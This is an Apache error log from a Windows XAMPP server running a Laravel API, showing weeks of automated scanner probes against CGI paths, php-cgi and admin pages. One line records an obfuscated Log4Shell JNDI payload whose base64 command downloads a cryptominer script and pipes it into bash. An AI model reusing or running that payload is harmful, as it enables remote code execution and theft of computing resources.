[Wed Oct 01 09:11:13.622315 2025] [cgi:error] [pid 10280:tid 1996] [client 45.88.186.85:40600] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/server, referer: http://157.250.206.62:8080/cgi-bin/server/server.cgi?func=server02_main_submit&counter=6.7496022225883&TEST_BTN4=
[Fri Oct 03 16:56:26.971351 2025] [cgi:error] [pid 10280:tid 2000] [client 216.180.246.186:45638] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/login.cgi
[Fri Oct 03 17:51:16.226932 2025] [cgi:error] [pid 10280:tid 1984] [client 35.201.248.4:8960] malformed header from script 'php-cgi.exe': Bad header: Security Alert! The PHP
[Fri Oct 03 17:51:17.900938 2025] [cgi:error] [pid 10280:tid 1984] [client 35.201.248.4:8961] malformed header from script 'php-cgi.exe': Bad header: Security Alert! The PHP
[Sat Oct 04 16:11:15.923700 2025] [cgi:error] [pid 10280:tid 1992] [client 35.229.144.117:2144] malformed header from script 'php-cgi.exe': Bad header: Security Alert! The PHP
[Sat Oct 04 16:11:16.299472 2025] [cgi:error] [pid 10280:tid 1992] [client 35.229.144.117:2145] malformed header from script 'php-cgi.exe': Bad header: Security Alert! The PHP
[Sun Oct 05 17:56:37.333447 2025] [cgi:error] [pid 10280:tid 1252] [client 35.201.212.116:37024] malformed header from script 'php-cgi.exe': Bad header: Security Alert! The PHP
[Sun Oct 05 17:56:39.645892 2025] [cgi:error] [pid 10280:tid 1252] [client 35.201.212.116:37025] malformed header from script 'php-cgi.exe': Bad header: Security Alert! The PHP
[Mon Oct 06 12:52:40.015074 2025] [cgi:error] [pid 10280:tid 584] [client 216.180.246.122:41750] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/login.cgi
[Mon Oct 06 17:30:55.440901 2025] [cgi:error] [pid 10280:tid 1260] [client 184.22.114.89:55862] malformed header from script 'php-cgi.exe': Bad header: Security Alert! The PHP
[Mon Oct 06 20:40:20.673044 2025] [cgi:error] [pid 10280:tid 1260] [client 184.22.114.89:61351] malformed header from script 'php-cgi.exe': Bad header: Security Alert! The PHP
[Tue Oct 07 04:02:20.286957 2025] [cgi:error] [pid 10280:tid 1260] [client 121.66.26.51:49588] malformed header from script 'php-cgi.exe': Bad header: Security Alert! The PHP
[Tue Oct 07 13:01:35.077069 2025] [cgi:error] [pid 9204:tid 2008] [client 45.88.186.85:48266] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Tue Oct 07 13:01:35.517347 2025] [cgi:error] [pid 9204:tid 2012] [client 45.88.186.85:48316] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/server, referer: http://157.250.206.62:8080/cgi-bin/server/server.cgi?func=server02_main_submit&counter=6.7496022225883&TEST_BTN4=
[Tue Oct 07 13:53:34.368532 2025] [cgi:error] [pid 9204:tid 2016] [client 45.88.186.85:53326] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Tue Oct 07 13:53:34.806018 2025] [cgi:error] [pid 9204:tid 2012] [client 45.88.186.85:53380] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/server, referer: http://157.250.206.62:8080/cgi-bin/server/server.cgi?func=server02_main_submit&counter=6.7496022225883&TEST_BTN4=
[Wed Oct 08 20:52:55.343535 2025] [cgi:error] [pid 11004:tid 2020] [client 216.180.246.39:45404] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/login.cgi
[Thu Oct 09 06:05:28.285556 2025] [core:error] [pid 11004:tid 2012] (20024)The given path is misformatted or contained invalid characters: [client 80.75.212.83:58000] AH00127: Cannot map GET /t%28%27$%7B$%7Benv:NaN:-j%7Dndi$%7Benv:NaN:-:%7D$%7Benv:NaN:-l%7Ddap$%7Benv:NaN:-:%7D//45.38.42.81:3389/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwczovL2Rvd25sb2FkLmMzcG9vbC5vcmcveG1yaWdfc2V0dXAvcmF3L21hc3Rlci9zZXR1cF9jM3Bvb2xfbWluZXIuc2ggfCBMQ19BTEw9ZW5fVVMuVVRGLTggYmFzaCAtcyA0ODZ4cXc3eXNYZEt3N1JrVnpUNXRkU2lEdEU2c294VWRZYUdhR0UxR29hQ2R2QkY3clZnNW9NWEw5cEZ4M3JCMVdVQ1pySnZkNkFITUZXaXBlWXQ1ZUZOVXg5cG1HTg==%7D%27%29 HTTP/1.1 to file, referer: t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//45.38.42.81:3389/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwczovL2Rvd25sb2FkLmMzcG9vbC5vcmcveG1yaWdfc2V0dXAvcmF3L21hc3Rlci9zZXR1cF9jM3Bvb2xfbWluZXIuc2ggfCBMQ19BTEw9ZW5fVVMuVVRGLTggYmFzaCAtcyA0ODZ4cXc3eXNYZEt3N1JrVnpUNXRkU2lEdEU2c294VWRZYUdhR0UxR29hQ2R2QkY3clZnNW9NWEw5cEZ4M3JCMVdVQ1pySnZkNkFITUZXaXBlWXQ1ZUZOVXg5cG1HTg==}')
[Fri Oct 10 01:24:26.739431 2025] [cgi:error] [pid 11004:tid 1992] [client 139.59.153.117:65050] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/authLogin.cgi
[Fri Oct 10 04:23:18.544967 2025] [cgi:error] [pid 11004:tid 2008] [client 64.227.116.108:50092] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/authLogin.cgi
[Fri Oct 10 10:19:13.001268 2025] [cgi:error] [pid 11004:tid 2000] [client 185.226.197.62:57702] malformed header from script 'php-cgi.exe': Bad header: Security Alert! The PHP
[Fri Oct 10 10:19:13.704394 2025] [cgi:error] [pid 11004:tid 2000] [client 185.226.197.62:57706] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/php-cgi.exe
[Fri Oct 10 10:19:13.970016 2025] [cgi:error] [pid 11004:tid 2000] [client 185.226.197.64:44905] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/authLogin.cgi
[Fri Oct 10 10:20:11.548101 2025] [cgi:error] [pid 11004:tid 2000] [client 185.226.197.62:53749] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/main.pl
[Sat Oct 11 01:29:42.877044 2025] [cgi:error] [pid 11004:tid 2012] [client 144.172.106.240:41244] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Sun Oct 12 00:52:46.712434 2025] [cgi:error] [pid 11004:tid 1972] [client 216.180.246.30:47926] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/login.cgi
[Sun Oct 12 11:15:53.227801 2025] [cgi:error] [pid 10124:tid 1868] [client 216.180.246.98:36282] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/login.cgi
[Sun Oct 12 15:05:00.843601 2025] [cgi:error] [pid 10124:tid 1880] [client 216.180.246.200:40492] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/login.cgi
[Sun Oct 12 23:37:38.211383 2025] [authz_core:error] [pid 4304:tid 1760] [client 35.216.220.254:42370] AH01630: client denied by server configuration: C:/xampp/htdocs/uslwmcbil_api/public/server-status
[Mon Oct 13 01:16:18.804796 2025] [cgi:error] [pid 4304:tid 2008] [client 217.154.83.80:42936] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Tue Oct 14 11:21:24.638686 2025] [cgi:error] [pid 4304:tid 1976] [client 216.180.246.17:41446] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/login.cgi
[Tue Oct 14 23:32:34.046594 2025] [cgi:error] [pid 4304:tid 1976] [client 45.153.34.54:58630] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Wed Oct 15 01:24:09.118890 2025] [cgi:error] [pid 4304:tid 2108] [client 121.66.26.51:62394] malformed header from script 'php-cgi.exe': Bad header: Security Alert! The PHP
[Wed Oct 15 07:35:54.957178 2025] [cgi:error] [pid 4304:tid 1892] [client 216.180.246.15:43232] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/login.cgi
[Wed Oct 15 09:04:56.312667 2025] [cgi:error] [pid 4304:tid 1644] [client 121.66.26.51:53610] malformed header from script 'php-cgi.exe': Bad header: Security Alert! The PHP
[Wed Oct 15 14:34:34.967598 2025] [cgi:error] [pid 4304:tid 2008] [client 121.66.26.51:62098] malformed header from script 'php-cgi.exe': Bad header: Security Alert! The PHP
[Thu Oct 16 11:59:16.733299 2025] [cgi:error] [pid 6928:tid 1992] [client 64.225.102.12:62928] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/authLogin.cgi
[Thu Oct 16 12:53:22.824119 2025] [cgi:error] [pid 6928:tid 2000] [client 31.57.106.233:46538] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Thu Oct 16 16:58:40.500656 2025] [cgi:error] [pid 6928:tid 2000] [client 216.180.246.117:52080] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/login.cgi
[Sat Oct 18 01:17:36.552806 2025] [authz_core:error] [pid 10024:tid 1964] [client 176.65.149.218:39182] AH01630: client denied by server configuration: C:/xampp/phpMyAdmin/scripts
[Sat Oct 18 01:17:37.521531 2025] [authz_core:error] [pid 10024:tid 1964] [client 176.65.149.218:39182] AH01630: client denied by server configuration: C:/xampp/phpMyAdmin/scripts
[Sat Oct 18 01:17:50.130695 2025] [authz_core:error] [pid 10024:tid 1964] [client 176.65.149.218:44366] AH01630: client denied by server configuration: C:/xampp/phpMyAdmin/scripts
[Sat Oct 18 01:17:54.036877 2025] [authz_core:error] [pid 10024:tid 1964] [client 176.65.149.218:44366] AH01630: client denied by server configuration: C:/xampp/phpMyAdmin/config.user.inc.php
[Sat Oct 18 02:14:30.060130 2025] [cgi:error] [pid 10024:tid 1956] [client 45.156.128.104:38491] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/authLogin.cgi
[Sat Oct 18 02:15:16.590569 2025] [cgi:error] [pid 10024:tid 2080] [client 45.156.128.103:37173] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/main.pl
[Sat Oct 18 02:15:43.686220 2025] [cgi:error] [pid 10024:tid 2080] [client 45.156.128.101:33426] malformed header from script 'php-cgi.exe': Bad header: Security Alert! The PHP
[Sat Oct 18 02:15:43.983092 2025] [cgi:error] [pid 10024:tid 2080] [client 45.156.128.101:33438] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/php-cgi.exe
[Sat Oct 18 16:45:59.885439 2025] [authz_core:error] [pid 10024:tid 1828] [client 95.215.0.144:48646] AH01630: client denied by server configuration: C:/xampp/htdocs/uslwmcbil_api/public/server-status
[Sat Oct 18 23:29:36.656411 2025] [authz_core:error] [pid 10024:tid 1812] [client 95.215.0.144:56076] AH01630: client denied by server configuration: C:/xampp/htdocs/uslwmcbil_api/public/server-status
[Sun Oct 19 07:58:21.358453 2025] [authz_core:error] [pid 10860:tid 1848] [client 95.215.0.144:54720] AH01630: client denied by server configuration: C:/xampp/htdocs/uslwmcbil_api/public/server-status
[Sun Oct 19 10:50:53.229204 2025] [authz_core:error] [pid 10860:tid 1848] [client 95.215.0.144:34452] AH01630: client denied by server configuration: C:/xampp/htdocs/uslwmcbil_api/public/server-status
[Mon Oct 20 19:46:01.913715 2025] [cgi:error] [pid 9848:tid 1796] [client 87.120.191.84:34842] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Mon Oct 20 20:05:59.893648 2025] [cgi:error] [pid 9848:tid 2008] [client 103.22.99.232:45790] malformed header from script 'php-cgi.exe': Bad header: Security Alert! The PHP
[Tue Oct 21 01:44:23.739318 2025] [cgi:error] [pid 9848:tid 1964] [client 216.180.246.68:60708] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/login.cgi
[Tue Oct 21 11:52:27.462089 2025] [cgi:error] [pid 9848:tid 1848] [client 5.253.86.217:64856] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Tue Oct 21 13:04:44.131222 2025] [cgi:error] [pid 9848:tid 1924] [client 124.198.131.83:39392] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Tue Oct 21 13:04:44.584339 2025] [cgi:error] [pid 9848:tid 1760] [client 124.198.131.83:39450] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/server, referer: http://157.250.206.62:8080/cgi-bin/server/server.cgi?func=server02_main_submit&counter=6.7496022225883&TEST_BTN4=
[Thu Oct 23 15:08:20.699999 2025] [cgi:error] [pid 9236:tid 1104] [client 216.180.246.139:41176] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/login.cgi
[Thu Oct 23 17:12:06.689583 2025] [cgi:error] [pid 9236:tid 1184] [client 193.142.147.209:31880] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Thu Oct 23 19:16:13.382048 2025] [cgi:error] [pid 9236:tid 1184] [client 193.142.147.209:13624] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Thu Oct 23 21:31:01.768016 2025] [cgi:error] [pid 9236:tid 1560] [client 193.142.147.209:30656] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Fri Oct 24 02:19:03.369566 2025] [cgi:error] [pid 9236:tid 1560] [client 193.142.147.209:58914] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Fri Oct 24 06:26:13.223440 2025] [cgi:error] [pid 9236:tid 1560] [client 193.142.147.209:34218] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Fri Oct 24 07:39:44.843825 2025] [cgi:error] [pid 9236:tid 1380] [client 193.142.147.209:4498] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Fri Oct 24 09:16:27.624432 2025] [cgi:error] [pid 9236:tid 1380] [client 193.142.147.209:8600] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Fri Oct 24 10:34:59.837970 2025] [cgi:error] [pid 9236:tid 1780] [client 193.142.147.209:2636] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Fri Oct 24 11:59:38.664969 2025] [cgi:error] [pid 9236:tid 924] [client 193.142.147.209:53120] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Fri Oct 24 13:18:53.311360 2025] [cgi:error] [pid 9236:tid 924] [client 193.142.147.209:16628] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Fri Oct 24 14:57:26.976889 2025] [cgi:error] [pid 9236:tid 924] [client 193.142.147.209:37194] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Fri Oct 24 16:10:52.674430 2025] [cgi:error] [pid 9236:tid 1960] [client 193.142.147.209:6290] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Fri Oct 24 18:52:58.460427 2025] [cgi:error] [pid 9236:tid 1960] [client 193.142.147.209:24674] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Fri Oct 24 20:12:00.247728 2025] [cgi:error] [pid 9236:tid 196] [client 193.142.147.209:12056] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Fri Oct 24 21:52:04.591925 2025] [cgi:error] [pid 9236:tid 1960] [client 193.142.147.209:46056] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Fri Oct 24 22:57:43.381618 2025] [cgi:error] [pid 9236:tid 1900] [client 193.142.147.209:59366] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Sat Oct 25 00:44:03.751006 2025] [cgi:error] [pid 9236:tid 1900] [client 193.142.147.209:57852] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Sat Oct 25 00:49:42.130654 2025] [cgi:error] [pid 9236:tid 924] [client 165.227.158.189:20938] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/authLogin.cgi
[Sat Oct 25 01:53:22.411328 2025] [cgi:error] [pid 9236:tid 1360] [client 193.142.147.209:46334] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Sat Oct 25 03:19:50.680895 2025] [cgi:error] [pid 9236:tid 1008] [client 193.142.147.209:49778] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Sat Oct 25 09:30:07.097740 2025] [cgi:error] [pid 9236:tid 1960] [client 124.198.131.83:56348] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Sat Oct 25 09:30:07.550858 2025] [cgi:error] [pid 9236:tid 1028] [client 124.198.131.83:56418] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/server, referer: http://157.250.206.62:8080/cgi-bin/server/server.cgi?func=server02_main_submit&counter=6.7496022225883&TEST_BTN4=
[Sat Oct 25 10:15:49.726312 2025] [cgi:error] [pid 9236:tid 1008] [client 193.142.147.209:12674] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Sat Oct 25 12:14:03.633399 2025] [cgi:error] [pid 9236:tid 1008] [client 193.142.147.209:14144] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Sat Oct 25 12:27:08.032783 2025] [cgi:error] [pid 9236:tid 1960] [client 124.198.131.83:41186] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Sat Oct 25 12:27:08.501526 2025] [cgi:error] [pid 9236:tid 924] [client 124.198.131.83:41252] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/server, referer: http://157.250.206.62:8080/cgi-bin/server/server.cgi?func=server02_main_submit&counter=6.7496022225883&TEST_BTN4=
[Sat Oct 25 13:41:55.018827 2025] [cgi:error] [pid 9236:tid 1008] [client 193.142.147.209:44700] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Sat Oct 25 15:43:52.924168 2025] [cgi:error] [pid 9236:tid 1960] [client 193.142.147.209:52728] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Sat Oct 25 17:19:36.698387 2025] [cgi:error] [pid 9236:tid 1428] [client 193.142.147.209:29228] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Sat Oct 25 20:43:00.825711 2025] [cgi:error] [pid 9236:tid 924] [client 193.142.147.209:54756] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Sat Oct 25 23:01:21.555587 2025] [cgi:error] [pid 9236:tid 1776] [client 193.142.147.209:46420] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Sun Oct 26 01:52:16.148481 2025] [cgi:error] [pid 9236:tid 984] [client 193.142.147.209:13400] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Sun Oct 26 03:43:25.243490 2025] [cgi:error] [pid 9236:tid 1008] [client 193.142.147.209:22834] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Sun Oct 26 05:30:37.497013 2025] [cgi:error] [pid 9236:tid 1776] [client 193.142.147.209:20022] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Sun Oct 26 07:05:00.448141 2025] [cgi:error] [pid 9236:tid 1008] [client 193.142.147.209:6590] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Sun Oct 26 08:53:21.485839 2025] [cgi:error] [pid 9236:tid 196] [client 193.142.147.209:8094] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Sun Oct 26 10:46:44.381371 2025] [cgi:error] [pid 9236:tid 1028] [client 193.142.147.209:33458] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Sun Oct 26 10:53:33.807930 2025] [cgi:error] [pid 9236:tid 1960] [client 45.156.129.164:37383] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/authLogin.cgi
[Sun Oct 26 10:54:22.524690 2025] [cgi:error] [pid 9236:tid 1960] [client 45.156.129.164:38305] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/main.pl
[Sun Oct 26 10:54:23.821543 2025] [cgi:error] [pid 9236:tid 1776] [client 45.156.129.164:44934] malformed header from script 'php-cgi.exe': Bad header: Security Alert! The PHP
[Sun Oct 26 10:54:23.930916 2025] [cgi:error] [pid 9236:tid 1776] [client 45.156.129.164:44948] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/php-cgi.exe
[Sun Oct 26 11:15:15.986466 2025] [php:error] [pid 9236:tid 1776] [client 157.250.206.62:55618] PHP Fatal error: Maximum execution time of 120 seconds exceeded in C:\\xampp\\htdocs\\uslwmcbil_api\\vendor\\laravel\\framework\\src\\Illuminate\\Foundation\\Bootstrap\\HandleExceptions.php on line 254, referer: https://communivest.cbilbd.com/deposit
[Sun Oct 26 11:15:17.048950 2025] [php:error] [pid 9236:tid 1092] [client 157.250.206.62:55629] PHP Fatal error: Maximum execution time of 120 seconds exceeded in C:\\xampp\\htdocs\\uslwmcbil_api\\vendor\\laravel\\framework\\src\\Illuminate\\Foundation\\Bootstrap\\HandleExceptions.php on line 254, referer: https://communivest.cbilbd.com/deposit
[Sun Oct 26 11:15:17.283317 2025] [php:error] [pid 9236:tid 1944] [client 157.250.206.62:55630] PHP Fatal error: Maximum execution time of 120 seconds exceeded in C:\\xampp\\htdocs\\uslwmcbil_api\\vendor\\laravel\\framework\\src\\Illuminate\\Foundation\\Bootstrap\\HandleExceptions.php on line 254, referer: https://communivest.cbilbd.com/deposit
[Sun Oct 26 11:15:18.783281 2025] [php:error] [pid 9236:tid 1940] [client 157.250.206.62:55643] PHP Fatal error: Maximum execution time of 120 seconds exceeded in C:\\xampp\\htdocs\\uslwmcbil_api\\vendor\\laravel\\framework\\src\\Illuminate\\Foundation\\Bootstrap\\HandleExceptions.php on line 254, referer: http://localhost:3000/
[Sun Oct 26 11:15:19.002036 2025] [php:error] [pid 9236:tid 924] [client 157.250.206.62:55632] PHP Fatal error: Maximum execution time of 120 seconds exceeded in C:\\xampp\\htdocs\\uslwmcbil_api\\vendor\\laravel\\framework\\src\\Illuminate\\Foundation\\Bootstrap\\HandleExceptions.php on line 254, referer: https://communivest.cbilbd.com/login?callbackUrl=https%3A%2F%2Fcommunivest.cbilbd.com%2Fdeposit
[Sun Oct 26 11:18:38.545312 2025] [php:error] [pid 9236:tid 1428] [client 157.250.206.62:55673] PHP Fatal error: Maximum execution time of 120 seconds exceeded in C:\\xampp\\htdocs\\uslwmcbil_api\\vendor\\laravel\\framework\\src\\Illuminate\\Foundation\\Bootstrap\\HandleExceptions.php on line 254, referer: https://communivest.cbilbd.com/login?callbackUrl=https%3A%2F%2Fcommunivest.cbilbd.com%2Fdeposit
[Sun Oct 26 11:37:47.376185 2025] [php:error] [pid 9236:tid 1428] [client 157.250.206.62:55697] PHP Fatal error: Maximum execution time of 120 seconds exceeded in C:\\xampp\\htdocs\\uslwmcbil_api\\vendor\\laravel\\framework\\src\\Illuminate\\Foundation\\Bootstrap\\HandleExceptions.php on line 254, referer: https://communivest.cbilbd.com/login?callbackUrl=https%3A%2F%2Fcommunivest.cbilbd.com%2Fhome
[Sun Oct 26 11:37:58.228376 2025] [php:error] [pid 9236:tid 1028] [client 157.250.206.62:55702] PHP Fatal error: Maximum execution time of 120 seconds exceeded in C:\\xampp\\htdocs\\uslwmcbil_api\\vendor\\laravel\\framework\\src\\Illuminate\\Foundation\\Bootstrap\\HandleExceptions.php on line 254
[Sun Oct 26 11:37:58.665867 2025] [php:error] [pid 9236:tid 1960] [client 157.250.206.62:55705] PHP Fatal error: Maximum execution time of 120 seconds exceeded in C:\\xampp\\htdocs\\uslwmcbil_api\\vendor\\laravel\\framework\\src\\Illuminate\\Foundation\\Bootstrap\\HandleExceptions.php on line 254, referer: https://communivest.cbilbd.com/login?callbackUrl=https%3A%2F%2Fcommunivest.cbilbd.com%2Fhome
[Sun Oct 26 12:32:24.167456 2025] [cgi:error] [pid 9236:tid 196] [client 193.142.147.209:8844] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Sun Oct 26 12:37:00.231842 2025] [php:error] [pid 9236:tid 1960] [client 157.250.206.62:55753] PHP Fatal error: Maximum execution time of 120 seconds exceeded in C:\\xampp\\htdocs\\uslwmcbil_api\\vendor\\laravel\\framework\\src\\Illuminate\\Foundation\\Bootstrap\\HandleExceptions.php on line 254, referer: https://communivest.cbilbd.com/login?callbackUrl=https%3A%2F%2Fcommunivest.cbilbd.com%2Fhome
[Sun Oct 26 12:37:09.075407 2025] [php:error] [pid 9236:tid 1008] [client 157.250.206.62:55759] PHP Fatal error: Maximum execution time of 120 seconds exceeded in C:\\xampp\\htdocs\\uslwmcbil_api\\vendor\\laravel\\framework\\src\\Illuminate\\Foundation\\Bootstrap\\HandleExceptions.php on line 254
[Sun Oct 26 13:26:31.509029 2025] [php:error] [pid 9236:tid 1960] [client 157.250.206.62:55790] PHP Fatal error: Maximum execution time of 120 seconds exceeded in C:\\xampp\\htdocs\\uslwmcbil_api\\vendor\\laravel\\framework\\src\\Illuminate\\Foundation\\Bootstrap\\HandleExceptions.php on line 254
[Sun Oct 26 14:14:36.053578 2025] [cgi:error] [pid 9236:tid 196] [client 193.142.147.209:53360] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
